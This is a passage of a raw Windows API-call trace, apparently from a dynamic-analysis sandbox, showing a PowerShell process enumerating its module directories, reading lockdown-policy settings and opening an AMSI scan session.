SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c420) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c3e0) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c630) returned 1 [0169.068] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5f0) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c680) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c5b0) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c570) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c830) returned 1 [0169.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c7f0) returned 1 [0169.070] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c0f0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\1.1\\PSReadline.psd1", lpFilePart=0x0) returned 0x49 [0169.070] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c5d0) returned 1 [0169.070] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c540) returned 1 [0169.071] GetFileAttributesW (lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules\\PSReadline\\PSReadline.psd1" (normalized: "c:\\program files\\windowspowershell\\modules\\psreadline\\psreadline.psd1")) returned 0xffffffff [0169.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c950) returned 1 [0169.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c910) returned 1 [0169.072] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c9a0) returned 1 [0169.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c8d0) returned 1 [0169.072] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c890) returned 1 [0169.075] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0169.076] FindNextFileW (in: hFindFile=0x1e35146b960, lpFindFileData=0xb156f8c610 | out: lpFindFileData=0xb156f8c610*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x13baafd, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe921041, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe921041, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SmbShare", cAlternateFileName="")) returned 1 [0169.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0169.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0169.077] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c940) returned 1 [0169.077] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c870) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c830) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.078] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.079] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.080] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36bc7ac0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x36bc7ac0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x36bc7ac0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x420, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0169.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.080] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.080] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.081] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.082] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.083] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.084] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.085] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6f8bffde, ftCreationTime.dwHighDateTime=0x1d112f2, ftLastAccessTime.dwLowDateTime=0x6f8e6231, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8e6231, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.085] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.086] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.087] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7c0) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c780) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c810) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c740) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c700) returned 1 [0169.088] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.089] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\DirectAccessClientComponents\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x132219b, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x132219b, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b000 [0169.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0xb156f8c7b0) returned 1 [0169.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6e0) returned 1 [0169.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0xb156f8c6a0) returned 1 [0169.092] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.094] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\iSCSI\\iSCSI.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\iscsi\\iscsi.psd1")) returned 0x20 [0169.098] FindNextFileW (in: hFindFile=0x1e35146b240, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0169.101] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\en-US.xaml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\en-us.xaml")) returned 0xffffffff [0169.103] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\MsDtc\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\msdtc\\*"), lpFindFileData=0xb156f8c4c0 | out: lpFindFileData=0xb156f8c4c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbe8fadd5, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbe8fadd5, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b240 [0169.105] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104cf9d7, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104cf9d7, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104cf9d7, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x14e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterVPort.Format.ps1xml", cAlternateFileName="")) returned 1 [0169.106] FindNextFileW (in: hFindFile=0x1e35146a880, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x104f5c2d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x104f5c2d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x104f5c2d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x148f, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetAdapterQos.Format.Helper.psm1", cAlternateFileName="")) returned 1 [0169.108] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetEventPacketCapture\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\neteventpacketcapture\\*"), lpFindFileData=0xb156f8c520 | out: lpFindFileData=0xb156f8c520*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x132219b, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xa503e3d, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xa503e3d, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1e35146b960 [0169.112] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x103784ac, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x103784ac, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x103784ac, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x8200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.Firewall.Commands.dll", cAlternateFileName="")) returned 1 [0169.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", nBufferLength=0x105, lpBuffer=0xb156f8c370, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\NetTCPIP", lpFilePart=0x0) returned 0x3b [0169.116] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe263b10, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe263b10, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe263b10, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x24bc, dwReserved0=0x0, dwReserved1=0x0, cFileName="NetworkSwitchFeature.psm1", cAlternateFileName="")) returned 1 [0169.117] FindNextFileW (in: hFindFile=0x1e35146b720, lpFindFileData=0xb156f8c4e0 | out: lpFindFileData=0xb156f8c4e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfaada0c, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfaada0c, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfaada0c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x3a5d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_NetIpHTTPsConfiguration.cdxml", cAlternateFileName="")) returned 1 [0169.119] FindNextFileW (in: hFindFile=0x1e35146ae20, lpFindFileData=0xb156f8c480 | out: lpFindFileData=0xb156f8c480*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x212f7dc1, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x212f7dc1, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x212f7dc1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x1799, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_Printer.format.ps1xml", cAlternateFileName="")) returned 1 [0169.135] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144bfb0 [0169.135] GetSystemDirectoryW (in: lpBuffer=0x1e35144bfb0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0169.135] CoTaskMemFree (pv=0x1e35144bfb0) [0169.135] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8c340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0169.135] WldpGetLockdownPolicy () returned 0x0 [0169.135] GetSystemInfo (in: lpSystemInfo=0xb156f8c8d0 | out: lpSystemInfo=0xb156f8c8d0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0169.135] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c7d8 | out: phkResult=0xb156f8c7d8*=0x798) returned 0x0 [0169.136] RegQueryValueExW (in: hKey=0x798, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8c828, lpData=0x0, lpcbData=0xb156f8c820*=0x0 | out: lpType=0xb156f8c828*=0x0, lpData=0x0, lpcbData=0xb156f8c820*=0x0) returned 0x2 [0169.136] RegCloseKey (hKey=0x798) returned 0x0 [0169.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0xb156f8c1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77 [0169.136] CreateFileW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautils.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x798 [0169.142] CoTaskMemAlloc (cb=0x20c) returned 0x1e35144c610 [0169.142] GetSystemDirectoryW (in: lpBuffer=0x1e35144c610, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0169.142] CoTaskMemFree (pv=0x1e35144c610) [0169.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0xb156f8c1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0169.142] WldpGetLockdownPolicy () returned 0x0 [0169.142] GetSystemInfo (in: lpSystemInfo=0xb156f8c730 | out: lpSystemInfo=0xb156f8c730*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0169.143] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xb156f8c638 | out: phkResult=0xb156f8c638*=0x738) returned 0x0 [0169.143] RegQueryValueExW (in: hKey=0x738, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0xb156f8c688, lpData=0x0, lpcbData=0xb156f8c680*=0x0 | out: lpType=0xb156f8c688*=0x0, lpData=0x0, lpcbData=0xb156f8c680*=0x0) returned 0x2 [0169.143] RegCloseKey (hKey=0x738) returned 0x0 [0169.143] CloseHandle (hObject=0x798) returned 1 [0169.150] CoCreateGuid (in: pguid=0xb156f8c7e8 | out: pguid=0xb156f8c7e8*(Data1=0x95b9f8e5, Data2=0x7673, Data3=0x4df8, Data4=([0]=0xbe, [1]=0xd9, [2]=0x46, [3]=0xe, [4]=0xdb, [5]=0xf2, [6]=0x10, [7]=0x3))) returned 0x0 [0169.150] AmsiOpenSession () returned 0x0 [0169.150] AmsiScanString () returned 0x80070015 [0169.175] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\en-US\\Microsoft.PowerShell.ODataUtils.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\en-us\\microsoft.powershell.odatautils.psd1")) returned 0xffffffff [0169.180] CoTaskMemAlloc (cb=0x20e) returned 0x1e35144fb30 [0169.180] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1e35144fb30, nSize=0x105 | out: lpBuffer="") returned 0x0 [0169.181] CoTaskMemFree (pv=0x1e35144fb30) [0169.181] CoTaskMemAlloc (cb=0x20c) returned 